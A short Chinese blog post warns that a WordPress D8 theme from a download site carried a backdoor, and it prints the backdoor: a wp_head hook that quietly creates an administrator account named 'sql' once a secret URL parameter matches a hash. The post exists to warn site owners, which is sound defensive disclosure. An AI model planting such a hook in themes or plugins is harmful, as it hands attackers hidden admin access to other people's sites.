WordPress模板中的后门
- 发表于
- WordPress
就在刚刚,在网上乱逛,刚好看到有个网站提供最新D8主题下载,顺手下了看一下,结果下来一看就发现个后门,如下:
|
1 2 3 4 5 6 7 8 9 10 11 |
add_action( 'wp_head', 'sql' ); function sql() { if ( md5( $_GET['sql'] ) == '6864f389d9876436bc8778ff071d1b6c' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'sql' ) ) { $user_id = wp_create_user( 'sql', 'sql' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } } |
在此也提醒各位使用网上提供的模板时,也要留心注意安全,像这样带有后门的主题不在少数,之前也看到过一句话和参数型后门。
原文连接:WordPress模板中的后门
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
